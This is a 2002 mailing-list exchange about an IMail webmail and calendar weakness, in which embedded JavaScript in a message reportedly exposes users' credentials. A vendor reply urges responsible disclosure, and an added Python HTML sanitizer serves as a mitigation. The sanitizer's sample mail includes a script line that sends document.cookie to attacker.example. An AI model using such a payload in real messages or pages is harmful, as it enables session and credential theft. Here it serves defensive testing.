Norman,
 
About 3,000 anonymous people subscribe to this list. It would probably be best to notify the software manufacturers first, and give them a reasonable period of time to respond/patch before you describe cracking methods in a public forum. Just my biased $0.02 as a software manufacturer. :)

Ron Hornbaker

 -
http://humankindsystems.com - 2,603 admins can't be wrong
 -
http://AnswerTrack.com - eCRM email tracking & routing
 -
http://KillerWebMail.com - the name says it all
 - 1-888-952-4888 or [EMAIL PROTECTED]


-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Norman J. Nolasco
Sent: Tuesday, March 19, 2002 4:49 PM
To: [EMAIL PROTECTED]
Subject: [IMail Forum] Problem With Calendaring

<disclaimer>If anyone thinks I should NOT be posting these weaknesses in this Forum,
speak up and I'll stop.  I'm just thinking that you might want to be aware of this stuff
before it hits you.</disclaimer>
 
There is a way to use the aforementioned embedded JavaScript thing to obtain the
username and password of any iMail Calendar user WITHOUT redirecting them to
another login screen.  I haven't tested this on the default templates, just KWM.  But
this is definitely an iMail issue with the way they handle security.  Just opening the
mail gets their username and password.
 
This is related to the fact that Calendaring has to run on a different port.  The security
context is transferred to the "new server" insecurely.
 
There is another way to do "humorous" things like change the forwarding address,
vacation settings, and the autoresponder for default template users (have not tested
this on KWM).  The classic worm virus model can also be implemented by opening
up the contacts pages with the same methods (I'm not touching that one, I have a
preference for freedom).
 
 
I'm taking it down if IPSwitch or any of the regulars here tell me to.  Personally, I'm
just going to load the messages from a different server, filter out HTML, display
it in a frame, and shut off web calendaring.
 
Thanks,
Norm
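Norm's own mitigation is to strip the HTML out of messages before showing them in a frame. The sanitizer below is an added example of that step, not code from this thread, from IMail or from KWM; it is an allow-list filter on the Python standard library's html.parser, and the sample message it runs on is constructed for the demonstration (the tag and attribute lists are this example's choices, not anything IMail ships).

```python
"""Strip active content from an HTML mail body before it is rendered.

Added example of the mitigation described in the thread (filter HTML out of
messages before displaying them in a frame). Not code from IMail or KWM.
Allow-list design: only listed tags and attributes survive, text is always
re-escaped, and URL attributes must carry a known-safe scheme.
"""
import html
from html.parser import HTMLParser

# Only these elements are emitted; any other tag is dropped but its text survives.
ALLOWED_TAGS = {
    "p", "br", "hr", "b", "i", "u", "strong", "em", "a", "img", "ul", "ol", "li",
    "table", "tr", "td", "th", "div", "span", "blockquote", "pre", "h1", "h2", "h3",
}
# These lose the tag *and* everything inside it (no user-visible text in there).
DROP_WITH_CONTENT = {"script", "style", "object", "embed", "applet",
                     "iframe", "frame", "frameset"}
VOID_TAGS = {"br", "hr", "img"}           # no closing tag is emitted for these
ALLOWED_ATTRS = {                         # per-tag attribute allow-list (no style, no on*)
    "a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
    "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities decoded, re-escaped on output
        self.out = []
        self.skip_depth = 0                       # >0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                                # tag dropped, inner text still flows
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue                          # event handlers and unlisted attrs go
            value = value or ""
            if name in URL_ATTRS:
                # Browsers ignore tab/CR/LF inside a URL, so "java\nscript:" is still
                # javascript:; strip those characters before checking the scheme.
                value = "".join(ch for ch in value if ch not in "\t\r\n").strip()
                if not value.lower().startswith(SAFE_SCHEMES):
                    continue                      # javascript:, data:, relative URLs ...
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))  # text is never emitted raw
    # Comments, doctypes and processing instructions have no handler: they vanish.


def sanitize_html(body: str) -> str:
    """Return the mail body with scripts, handlers, unsafe URLs and styles removed."""
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


# Constructed sample: the kind of embedded JavaScript the thread is warning about.
SAMPLE_MAIL = (
    '<html><head><script>location="http://attacker.example/?"+document.cookie</script></head>'
    '<body onload="steal()"><p>Hi <b>Norm</b>,</p>'
    '<a href="javascript:steal()">click</a> <a href="http://example.com/">ok</a>'
    '<img src="http://example.com/x.gif" onerror="steal()">'
    '<p>&lt;not a tag&gt;</p></body></html>'
)

if __name__ == "__main__":
    print(sanitize_html(SAMPLE_MAIL))
```

The filter only covers the message body. Serving the sanitized output from a separate host, as Norm describes, is what keeps whatever does slip through out of the webmail session's origin, and turning off web calendaring removes the port hand-off the post blames for the credential exposure.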
 
 
